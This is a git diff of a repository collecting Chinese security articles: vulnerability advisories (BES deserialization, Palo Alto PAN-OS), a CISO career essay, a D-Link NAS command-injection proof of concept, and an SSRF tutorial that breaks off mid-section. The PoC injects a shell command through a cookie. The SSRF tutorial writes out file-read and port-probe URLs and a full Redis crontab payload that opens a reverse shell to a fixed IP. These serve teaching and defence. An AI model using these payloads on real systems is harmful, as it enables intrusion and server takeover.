发现并向苹果提交漏洞报告的是谷歌威胁分析小组的 Clément Lecigne 和 Benoît Sevens,其中 Clément Lecigne 提交的漏洞通常都是遭到黑客利用的,或者说直接点说这名研究人员发现的漏洞通常都是由国家级黑客利用的。
|
||||||
|
|
||||||
|
这类漏洞只会针对某些具有极高价值目标的用户发起攻击,这也是为什么苹果会在 iOS 中增加高级保护模式的原因,在这个模式下 JavaScript 脚本都会被禁止运行 (本次提到的两个漏洞就有一个是 JavaScript Core 中的问题)。
|
||||||
|
|
||||||
|
|
||||||
|
来源:https://www.landiannews.com/archives/106713.html
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
END
|
||||||
|
|
||||||
|
|
||||||
|
阅读推荐
|
||||||
|
|
||||||
|
|
||||||
|
[【安全圈】2024全球最弱密码排名揭晓:“123456”再度登顶,你的密码安全吗?](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=1&sn=4670155de7d2f2afaa5fe30fda0bb2b0&chksm=f36e7d62c419f4745f1e8bba109c904e5aeda0df116d0348b08c58ebc5650933dc2d88c24c2c&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[【安全圈】谷歌Gemini AI 聊天机器人不断让用户“去死”](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=2&sn=690f569a72493488bb3ecd0770623b7e&chksm=f36e7d62c419f474675d76068180a0f3bdb5172cff33e5038437f76753bc0a27164756b87d36&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[【安全圈】美国饮用水系统存在300多个漏洞,影响1.1亿人](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=3&sn=45c8dff3a066a1615c872523d972e645&chksm=f36e7d62c419f474a8053972dd9c71ee6170c6482642d86218c62a4788ba6c3240875f3d16fb&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[【安全圈】VMware vCenter Server远程代码执行漏洞正被黑客广泛利用](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=4&sn=c7244d3c2cda936e8c968cf0a2ade6d0&chksm=f36e7d62c419f474201413fc6e1edcc5c024cfb6fa12a9adf16b49526e98689324bb9aa57fd0&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**安全圈**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
←扫码关注我们
|
||||||
|
|
||||||
|
**网罗圈内热点 专注网络安全**
|
||||||
|
|
||||||
|
**实时资讯一手掌握!**
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**好看你就分享 有用就点个赞**
|
||||||
|
|
||||||
|
**支持「****安全圈」就点个三连吧!**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
63
doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md
Normal file
63
doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md
Normal file
@ -0,0 +1,63 @@
|
|||||||
|
# 【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞
|
||||||
|
长亭安全应急响应中心 2024-11-20 09:12
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
宝兰德BES应用服务器(BESAppServer)是一款遵循JavaEE和JakartaEE规范的企业级中间件,提供Web容器、EJB容器、JMS容器、事务服务、JNDI服务等关键组件,为企业级应用提供稳定、安全、高效的运行平台。2024年11月,宝兰德官方发布安全补丁修复了一个反序列化漏洞。该漏洞无需认证即可被攻击者利用,建议受影响的用户尽快修复此漏洞。
|
||||||
|
**漏洞描述**
|
||||||
|
|
||||||
|
|
||||||
|
Description
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**0****1**
|
||||||
|
|
||||||
|
漏洞成因宝兰德 BESAppServer 对于通过 TCP 协议传入的数据过滤不严格,允许未经授权的攻击者使用 TCP 协议向服务器发送特制的请求,可以利用反序列化漏洞在未经授权的情况下远程执行任意代码或控制服务器。漏洞影响成功利用该漏洞的攻击者可以实现远程代码执行,控制受影响的服务器,潜在的危害包括数据泄露、系统崩溃,甚至可能被用于传播勒索等恶意软件。处置优先级:高漏洞类型:反序列化漏洞危害等级:严重触发方式:网络远程权限认证要求:无需权限系统配置要求:默认配置可利用用户交互要求:无需用户交互利用成熟度:POC/EXP未公开批量可利用性:可使用通用 POC/EXP,批量检测/利用修复复杂度:低,官方提供补丁修复方案影响版本 Affects 02- 9.5.2版本未安装补丁9.5.2.4703.031.T003- 9.5.5版本未安装补丁9.5.5.7266.046解决方案 Solution 03临时缓解方案1. 修改/conf/server.config 配置文件:将ejb-container处的http-channel-enabled改为false将ejb-listener处的enabled改为false2. 限制访问来源地址,如非必要,不要将3000端口开放在互联网上。升级修复方案宝兰德官方已发布安全补丁,可联系官方售后获取补丁使用。漏洞复现 Reproduction 04
|
||||||
|
**产品支持**
|
||||||
|
|
||||||
|
|
||||||
|
Support
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**05**
|
||||||
|
洞鉴:预计11月21日发布更新支持该漏洞检测。全悉:已发布规则升级包支持该漏洞利用行为的检测。雷池:非HTTP流量,不支持检测。
|
||||||
|
|
||||||
|
**时间线**
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**06**
|
||||||
|
11月18日 互联网公开披露该漏洞11月20日 长亭安全应急响应中心发布通告
|
||||||
|
参考资料:
|
||||||
|
|
||||||
|
[1].
|
||||||
|
https://www.bessystem.com/content/b00f1e9ee0ad49b8a8525eb0a1d38da9/info
|
||||||
|
|
||||||
|
|
||||||
|
**长亭应急响应服务**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
全力进行产品升级
|
||||||
|
|
||||||
|
及时将风险提示预案发送给客户
|
||||||
|
|
||||||
|
检测业务是否受到此次漏洞影响
|
||||||
|
|
||||||
|
请联系长亭应急服务团队
|
||||||
|
|
||||||
|
7*24小时,守护您的安全
|
||||||
|
|
||||||
|
|
||||||
|
第一时间找到我们:
|
||||||
|
|
||||||
|
邮箱:support@chaitin.com
|
||||||
|
|
||||||
|
应急响应热线:4000-327-707
|
||||||
|
|
27
doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md
Normal file
27
doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
# 【成功复现】D-Link NAS远程命令执行漏洞(Cookie)
|
||||||
|
原创 弥天安全实验室 弥天安全实验室 2024-11-20 10:30
|
||||||
|
|
||||||
|
网安引领时代,弥天点亮未来
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**0x00写在前面**
|
||||||
|
|
||||||
|
|
||||||
|
**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**
|
||||||
|
0x01漏洞介绍D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link NAS设备的/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞在cookie中执行任意系统命令,写入后门文件,获取服务器权限。0x02影响版本
|
||||||
|
1.D-Link DNS
|
||||||
|
0x03漏洞复现
|
||||||
|
1.访问漏洞环境
|
||||||
|
|
||||||
|

|
||||||
|
2.对漏洞进行复现 POC 漏洞复现GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Encoding: gzip, deflateConnection: closeCookie: username=mitian'& ps & echo 'mitian; 测试执行ps命令,通过响应判断漏洞存在。3.nuclei文件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.dlink.com/弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润! 弥 天安全实验室
|
||||||
|
|
||||||
|
|
File diff suppressed because one or more lines are too long
49
doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md
Normal file
49
doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md
Normal file
File diff suppressed because one or more lines are too long
@ -0,0 +1,28 @@
|
|||||||
|
# 【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)
|
||||||
|
404实验室 知道创宇404实验室 2024-11-20 06:13
|
||||||
|
|
||||||
|
近日,国外WatchTowr lab披露了Palo Alto Networks PAN-OS中的两个严重漏洞:CVE-2024-0012和CVE-2024-9474,可导致未经授权的远程代码执行(RCE)。报告指出,CVE-2024-0012为身份验证绕过漏洞,而CVE-2024-9474则是远程代码执行漏洞,二者可以联合使用,潜在地允许攻击者在目标系统上执行恶意代码。WatchTowr lab公布漏洞细节及相关Poc,另根据Palo Alto unit42报告,称该漏洞在2024年11月18日存在野外利用痕迹,官方确认这两个漏洞补丁已发布。
|
||||||
|
|
||||||
|
|
||||||
|
通过知道创宇旗下全球著名网络空间搜索引擎ZoomEye指纹搜索,有大量的Palo Alto Networks PAN-OS系统发布,再次提醒大家注意防御。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**修复建议:**
|
||||||
|
|
||||||
|
1、更新到官方修复版本:立即升级到Palo Alto Networks官方发布的修复版本,确保系统不受该漏洞影响。
|
||||||
|
|
||||||
|
2、监测与审查:检查设备日志中的可疑活动,以确认是否存在异常访问或已经攻击利用的行为。
|
||||||
|
|
||||||
|
|
||||||
|
**参考资料:**
|
||||||
|
|
||||||
|
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
|
||||||
|
|
||||||
|
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
|
||||||
|
|
||||||
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0012
|
||||||
|
|
||||||
|
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474
|
||||||
|
|
||||||
|
|
149
doc/一名优秀CISO的自述:是什么成就了我?.md
Normal file
149
doc/一名优秀CISO的自述:是什么成就了我?.md
Normal file
@ -0,0 +1,149 @@
|
|||||||
|
# 一名优秀CISO的自述:是什么成就了我?
|
||||||
|
管窥蠡测 安在 2024-11-20 09:31
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
从现实来看,CISO的职责已经超越了单纯的技术控制管理,扩展到了对业务战略的支撑。要想成为一名杰出的CISO,仅凭技术专长是远远不够的。为了高效工作,CISO需要平衡业务风险、抵御威胁,同时确保组织的韧性。
|
||||||
|
|
||||||
|
|
||||||
|
Elastic的CISO Mandy Andress指出:“这一角色已经转变,不再仅仅关注技术或合规性,而是成为了一名需要了解业务战略,以便在应对风险与在最具影响力的领域投资之间做出权衡决策的业务领导者。”
|
||||||
|
|
||||||
|
|
||||||
|
随着这一思维方式的转变,安全事件被视为一种必然存在,现在的重点是如何为安全事件的发生做好准备,而不是去假设它不会发生。Andress对此回忆道:“20年前如果发生数据泄露,CISO往往会成为替罪羊,并面临失业的风险,因为当时我们追求的是零事件。”然而,当下的人们已经接受了安全设置并非尽善尽美的事实,因此组织必须专注于提升韧性,并为安全事件的发生做好准备。
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**韧性和协调**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
过去,安全设置被视为一种非黑即白的二元选择——开或关。但现在,安全计划的设计需要能够帮助组织在事件发生时以最小的影响进行响应。因此,可以说响应和韧性规划是当下的重中之重,其涉及网络安全团队和业务运营团队的协作,并要求CISO在整个组织中进行协调,特别是在事件发生时。
|
||||||
|
|
||||||
|
Andress表示:“现在越来越多的人员会参与这一流程。因此,如果发生安全事件,涉及的将不仅仅是安全团队,还包括公关团队、通信团队,甚至可能包括高管,这取决于事件的规模和严重程度。”
|
||||||
|
|
||||||
|
此外,CISO还在预算讨论中发挥着领导作用。过去,预算资金的分配往往伴随着尽可能多做事的要求,但如今,这些讨论已经变得更加细致入微。Andress指出:“这一角色的难点在于,我们需要认识到,尽管有很多我们希望能够以不同方式处理的事情,也有很多我们知道可以做得更好的事情,但这些并不是当前业务的重点。”
|
||||||
|
|
||||||
|
|
||||||
|
**关于SecOps与GRC:CISO的理想职业背景**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CISO的出身背景具备多样化,其可能源自学术殿堂、职场磨砺或专业认证,然而,随着网络安全需求的持续演变,这些背景差异正被逐渐淡化。
|
||||||
|
|
||||||
|
据前CISO及现任董事会顾问Paul Connelly观察,以往SecOps背景的专家多聚焦于运营层面,而GRC背景的专家则侧重于通过合规性管理来降低风险。Connelly表示:“诚然,信息安全需要一定的技术基础,但CISO的角色并非限定于工程师或开发者。”
|
||||||
|
|
||||||
|
CISO需对信息安全职责有全面的认知,但其职业起点并不局限于某一特定领域,无论是IT部门还是内部审计团队,均可成为CISO的起点,而多元的行业与公司经历能够赋予他们独特的思考视角。尤为重要的是,现代CISO需将安全工作与业务目标紧密结合。Connelly强调:“相较于仅在SecOps或其他单一领域深耕的晋升者,那些在组织内部历经多岗锻炼、视野开阔的CISO们,往往具备更多的竞争优势。”
|
||||||
|
|
||||||
|
在规模较大的组织中,管理才能、领导力以及商业洞察力的重要性超越了技术能力。而在小型团队中,每位成员都需扮演多重角色,CISO通常还需担当技术领航者的重任。Connelly补充道:“此时,具备SecOps等技术基础便显得尤为重要了。”
|
||||||
|
|
||||||
|
最为关键的是,CISO需具备引领安全议程的能力。为了赢得董事会及高管层的信任,他们需深入理解信息安全业务的精髓。为此,网络安全领导力课程应运而生,其旨在培养能够跨越业务领域、引领安全变革的领导者。
|
||||||
|
|
||||||
|
Connelly表示:“我们的目标是培养出既具备商业智慧,又擅长沟通,且能与法律、审计等部门紧密协作的网络安全领导者,这是当今CISO职位领导力的理想组合。”
|
||||||
|
|
||||||
|
作为资深导师,Connelly为CISO们的职业发展及领导力塑造提供了宝贵建议。他建议大型组织中的CISO积极争取轮岗机会,以锻炼领导力。而若缺乏此类机会,那些有志于提升领导力的CISO则需主动寻求指导,并建立长期以业务目标为导向的合作关系,这可促进个人成长。Connelly建议道:“作为CISO,你需要找到一位愿意花时间为你提供建议、反馈,并能助你明确发展方向的导师。”
|
||||||
|
|
||||||
|
Connelly进一步指出,在寻找导师时,应先明确自身的需求,再筛选潜在的导师人选,并通过直接联系或共同联系人建立沟通渠道。为了充分利用这段关系,学员应设定明确的目标,在每次交流中主导对话,同时保持开放态度,接纳导师的意见与建议,并根据实际情况进行调整。“在建立这段关系之初,你需明确想要实现的目标或那些希望解决的难题。”
|
||||||
|
|
||||||
|
|
||||||
|
**CISO的角色已转变为关键影响者**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
如今,CISO的职责不再局限于技术层面,其有效性更多地依赖于在组织内部建立影响力。为了确保安全能成为组织整体流程和职责的一部分,CISO必须积极构建人际关系,并与多个团队协同工作。
|
||||||
|
|
||||||
|
对于CISO来说,影响力是推动安全项目的核心要素。正如Andress所言,过去那种单纯依靠技术解决方案的时代已经过去,现在的关键在于倾听并综合各方观点。因此,寻求共同解决方案至关重要,而这种咨询方法对CISO有效履行其职责具有重大意义。Andress表示:“这就是影响力的体现,即了解如何与不同的人建立联系,进行个性化交流,并灵活应对各种情况。”
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
要实现这一目标,需要深入理解不同团队的语言、需求和限制,从而促进更加积极的互动和讨论。Andress强调:“如果你带着‘这是唯一可行方法’的想法去沟通,那么很可能会引发对立关系;而如果你以‘这是我们共同目标,我们该携手合作’的态度出发,那么你就可以将焦点放在‘我们为什么要这么做’,以及‘它将如何助力业务成功或满足客户需求’上,从而营造出一种更加积极的互动氛围。”
|
||||||
|
|
||||||
|
网络安全招聘PlaceMe Recruitment的招聘主管Killian O’Leary也认同这一点,他认为创造共同目标、吸引利益相关者和发挥影响力是CISO的重要特质。
|
||||||
|
|
||||||
|
在过去,CISO往往是一个相对孤立的角色,适合某种特定性格类型的人员,而现在这一角色正逐渐转变为强调领导力和协作。O’Leary指出:“在招聘新CISO时,组织对这些品质给予了高度重视。领导层正在寻找那些具有魅力、能够吸引追随者、并让追随者认同安全路线图的CISO。”
|
||||||
|
|
||||||
|
根据O’Leary的经验,对于现代CISO来说,技术专长固然重要,但同样重要的是要认识到安全态势对不同的人而言有着不同的意味,这便要求了CISO需要了解不断变化的威胁,以能够引起领导层共鸣的方式提供见解,并在整个组织中培养安全思维。O’Leary强调:“优秀的CISO具备一定的魄力,因为他们能够进行艰难的对话,以友好的方式施加影响和提供建议,并了解他们的听众,同时推动他们的议程来赋能业务。”
|
||||||
|
|
||||||
|
然而,当组织未能充分理解CISO的角色时,可能会导致职位描述不匹配,并列出一系列与CISO必须匹配的技术能力,从而使情况变得复杂。
|
||||||
|
|
||||||
|
O’Leary认为,组织需要了解CISO是如何运作的、CISO将与谁接触以及CISO将与谁密切合作。在某些情况下,像O’Leary这样的招聘人员可能会解释,如果候选人拥有更多样化的经验,哪怕他们的任期较短或在一家组织的经验不符合职位模板,他们仍能胜任这个角色。O’Leary强调:“如果有人接触过许多不同的行业、挑战和业务类型,那么他们的经验就会更加全面。”
|
||||||
|
|
||||||
|
O’Leary认为,成长心态和适应性等个人品质将使CISO在这种多变的环境中茁壮成长。“任何优秀的CISO都会把此职位看作是一个正在进行的工作,而不是一个完成的作品,因为他们需要随着角色的发展而不断进步。”
|
||||||
|
|
||||||
|
所有人都会共识,对于CISO来说,其决定性的因素是激情,即对角色的激情和对确保组织安全的激情,这才是优秀CISO的核心。O’Leary总结道:“这种激情是重要的个人动力,并且在团队中具有传染性,有助于激发组织上下对保护组织、客户和员工的使命和信心。因此,优秀的CISO始终会对网络安全充满热情,并致力于终身学习和改进。”
|
||||||
|
|
||||||
|
|
||||||
|
**国内安全专家的建议**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
优秀的CSO/CISO需要具备哪些特质?又是什么能够成就这些特质?国内安全专家如此建议。
|
||||||
|
|
||||||
|
**owasp广东负责人刘志诚**
|
||||||
|
表示,对优秀的CSO/CISO而言,首先是业务能力,要对企业的业务具备充足的了解,包括目标、资源、流程、风险、核心竞争力等,只有了解业务,才能做好业务的支撑,在保持目标一致的情况下,协调安全风险达成共识,落实安全控制措施。
|
||||||
|
|
||||||
|
其次是全栈的技术体系能力,信息化技术日新月异,没有足够的全栈技术视野,在风险识别与判断,安全控制措施能力建设和运营落地的场景化上有所欠缺,很难构建主动防御纵深防御的安全防线。
|
||||||
|
|
||||||
|
第三,通用的管理能力,项目能力,产品能力,沟通、协作、预算,成本,产业互动,分享传承,无论是文字还是语言,对一个CSO而言,都需要全面而综合的素质与管理能力,如果缺少其中的关键环节,必须主动学习,快速补足。
|
||||||
|
|
||||||
|
第四,要具备安全的全局的知识架构和实践经验,显性知识体系有很多路径,学历、证书,体系化的学习可以获得,隐性知识需要长期沉浸、萃取、提炼、抽象、总结,形成自己的全局的安全观,并且持续学习,维持知识库的更新。“经验这个事情,很多时候需要机会去体验和历练,当然,分享案例和实践书籍都是成长路上不可或缺的精神食粮。这一点需要积累、沉淀,很难速成,这也是为什么安全负责人这么稀缺的关键原因。”
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**某集团 IT安全负责人李晓文**
|
||||||
|
表示,企业面临很多的商业风险,从Cyber Security的视角来看, CSO/CISO要应对的是信息资产被“窃”、数字化的业务流程被蓄意破坏等导致企业遭受直接或间接的经济损失,在数字化转型的大背景下,优秀的 CSO/CISO必须让安全成为业务及在线流程的一部分,简述需要具备的能力如下:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
[ 1] 理解并承接业务战略的能力:安全已成为不可脱离的部分,是业务基本保障不可缺少的一部分,至少要从支持业务发展、降低商业风险、遵从法律法规三个方向来负责安全相关的事宜,并将承接后的战略转化为战术项目。
|
||||||
|
|
||||||
|
|
||||||
|
[ 2]风险评估的能力:基于治理体系的模式,熟悉和理解业务,并立足科学的而非主观的风险评估,确保安全决策的投资收益比,安全技术能力的实施应适度超前,结合情报,构建持续的主动防御以更快响应可能新出现的威胁。
|
||||||
|
|
||||||
|
|
||||||
|
[ 3]持续学习的能力:理解企业的基础投资和技术创新,无论是企业的研发或是企业的IT,数字化的进程中,有些创新技术会带来颠覆性的改变,如何保护因这些技术创新产生的商业秘密或因此伴生的风险,需要持续学习和敏锐的洞察力。
|
||||||
|
|
||||||
|
|
||||||
|
[4 ]沟通能力:向上沟通-将战略承接转换为有数据支撑且可视的价值以持续的获取管理层的投资;横向沟通-服务和保障业务,横向拉通业务对安全的持续理解和认可;向下沟通- 赋能团队,一支善于作战和持续成长并产生合力的专业团队是业务信赖的基石。
|
||||||
|
|
||||||
|
|
||||||
|
[ 5]组织能力:应急响应不仅仅是团队的应急预案和日常演练,如何提高跨部门的应急响应能力更至关重要,需及时响应入侵攻击,最小化对业务的影响或破坏,应组织跨部门的模拟演练,以提升企业实时的响应能力。
|
||||||
|
|
||||||
|
**某证券机构安全负责人蒋琼**
|
||||||
|
表示,优秀的CSO/CISO需要具备安全或泛安全如风控合规审计方面专业基础,同时对于人员管理方面需要有足够的理论包括实践积累。“安全是个壁垒较高的行业,作为CSO尤其需要懂得尊重技术尊重人才,尊重安全本身具有的复杂性特点。当然,分析力、逻辑力、表达力,这几项管理类人才在职场上的能力项都是成为一名优秀的CSO所要具备的核心能力。”
|
||||||
|
|
||||||
|
**某集团安全专家梁龙亭**
|
||||||
|
表示,有自驱动力、不断学习、不断超越自我的人群更适合担任CSO/CISO,因为信息技术不断发展,攻击手段不断更新,魔高一尺,CSO/CISO必需道高一丈。CSO/CISO可以不必直接与黑客开展对抗,但是针对黑客的攻击,必须熟知市场上有哪些解决方案,各个解决方案的优缺点也要能够独立判断,一旦需要购买相关产品或者服务时,CSO/CISO要能够为公司找到性价比最高的解决方案。
|
||||||
|
|
||||||
|
此外,梁龙亭认为渗透测试人群更可能成为CSO,一是具有“技术安全”的实操能力,再辅以“管理安全“的系统思维,研究学习所有安全相关的“法律法规”,就具备了CSO的三大经典能力。从技术走来的CSO/CISO,顺流而下,左右逢源,一泻千里;CSO/CISO最终会去实向虚,形成“安全哲学”,成长为安全思想“大家”;而从审计、安全认证咨询走来的CSO/CISO,艰难走向“技术安全”这座大山,逆流而上,且进且退,避实就虚,终将难以名副其实。
|
||||||
|
|
||||||
|
原文地址:
|
||||||
|
|
||||||
|
What makes a great CISO | CSO Online
|
||||||
|
|
||||||
|
|
||||||
|
作者:
|
||||||
|
|
||||||
|
Rosalyn Page 网络安全领域的记者
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**END**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
点击这里阅读原文
|
||||||
|
|
168
doc/一文读懂SSRF漏洞.md
Normal file
168
doc/一文读懂SSRF漏洞.md
Normal file
@ -0,0 +1,168 @@
|
|||||||
|
# 一文读懂SSRF漏洞
|
||||||
|
simple学安全 simple学安全 2024-11-20 10:56
|
||||||
|
|
||||||
|
目录
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
简介
|
||||||
|
|
||||||
|
SSRF全称服务器端请求伪造,是一种由攻击者构造请求,由服务器端发起请求的漏洞,正由于这一点,SSRF攻击的目标是外网无法访问的内网系统。
|
||||||
|
|
||||||
|
漏洞出现的原因是web应用程序提供了从其他服务器应用获取数据的功能,却没有对目标地址做过滤和限制。导致存在漏洞的应用成为攻击者的跳板机。
|
||||||
|
|
||||||
|
漏洞利用
|
||||||
|
|
||||||
|
1、**读取服务器本地文件**
|
||||||
|
|
||||||
|
利用
|
||||||
|
file协议
|
||||||
|
可以读取本地文件:
|
||||||
|
```
|
||||||
|
Windows:
|
||||||
|
file://127.0.0.1/c:/ 访问本地C盘
|
||||||
|
file://localhost/d:/ 访问本地D盘
|
||||||
|
file:///e:/ 访问本地E盘
|
||||||
|
|
||||||
|
Linux:
|
||||||
|
file:///etc/hosts
|
||||||
|
```
|
||||||
|
|
||||||
|
现有 http://192.168.1.128/ssrf.php?url= 存在SSRF漏洞,可利用file协议读取本地文件:
|
||||||
|
```
|
||||||
|
?url=file:///c:/windows/win.ini
|
||||||
|
?url=file://127.0.0.1/c:/windows/win.ini
|
||||||
|
?url=file://localhost/c:/windows/win.ini
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2、**收集内网信息**
|
||||||
|
|
||||||
|
方法一:直接将参数值设置为内网地址,附带端口号,判断内网主机端口开放情况,这里探测到服务器开放3306端口
|
||||||
|
```
|
||||||
|
?url=127.0.0.1:3306
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
方法二:利用
|
||||||
|
dict协议
|
||||||
|
探测端口,dict协议格式如下:
|
||||||
|
```
|
||||||
|
dict://ip:port/命令:参数
|
||||||
|
```
|
||||||
|
|
||||||
|
其中命令和参数不是必须的。
|
||||||
|
|
||||||
|
使用dict协议探测到服务器开放3306端口:
|
||||||
|
```
|
||||||
|
?url=dict://127.0.0.1:3306/
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
3、**攻击内网redis**
|
||||||
|
|
||||||
|
ssrf漏洞常用于攻击内网redis服务,可先使用file协议读取服务器的网络配置文件,获得内网ip以及子网掩码,随后使用收集内网信息的方法探测内网的redis服务,常用端口6379。这里探测到172.19.0.2存在redis服务
|
||||||
|
|
||||||
|
方法一:利用http协议
|
||||||
|
|
||||||
|
1)redis是通过换行符区分每条命令的,可以使用%0d%0a代表换行符,达到一次传入多条命令的目的,利用redis写计划任务反弹shell:
|
||||||
|
```
|
||||||
|
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.11.132/4444 0>&1'\n\n\n\n"
|
||||||
|
config set dir /etc/
|
||||||
|
config set dbfilename crontab
|
||||||
|
save
|
||||||
|
```
|
||||||
|
|
||||||
|
2)特殊字符进行url编码,换行符使用%0d%0a:
|
||||||
|
```
|
||||||
|
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
|
||||||
|
```
|
||||||
|
|
||||||
|
3)拼接前还需要在前后加上一些字符表示开始和结束:
|
||||||
|
```
|
||||||
|
开头:start%0d%0a%0d%0a
|
||||||
|
结尾:%0d%0a%0d%0aend
|
||||||
|
|
||||||
|
其中start和end可以是任何字符串,没有要求
|
||||||
|
```
|
||||||
|
|
||||||
|
4)得到最终payload
|
||||||
|
```
|
||||||
|
start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend
|
||||||
|
```
|
||||||
|
|
||||||
|
5)发送攻击请求包,成功反弹shell
|
||||||
|
```
|
||||||
|
?url=http://172.19.0.2:6379/start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
方法二:利用
|
||||||
|
gopher协议
|
||||||
|
攻击内网redis,gopher协议可以构造任意的tcp/ip数据包,格式如下:
|
||||||
|
```
|
||||||
|
gopher://ip:port/_数据
|
||||||
|
```
|
||||||
|
|
||||||
|
1)可用如下工具生成反弹shell的payload:
|
||||||
|
|
||||||
|
https://github.com/tarunkant/Gopherus
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
其中127.0.0.1:6379要换成实际的存在redis服务的地址。
|
||||||
|
|
||||||
|
2)由于服务端接受数据后会自动进行一次url解码,为了保持结构完整,需要对gopher协议的数据再进行一次url编码
|
||||||
|
```
|
||||||
|
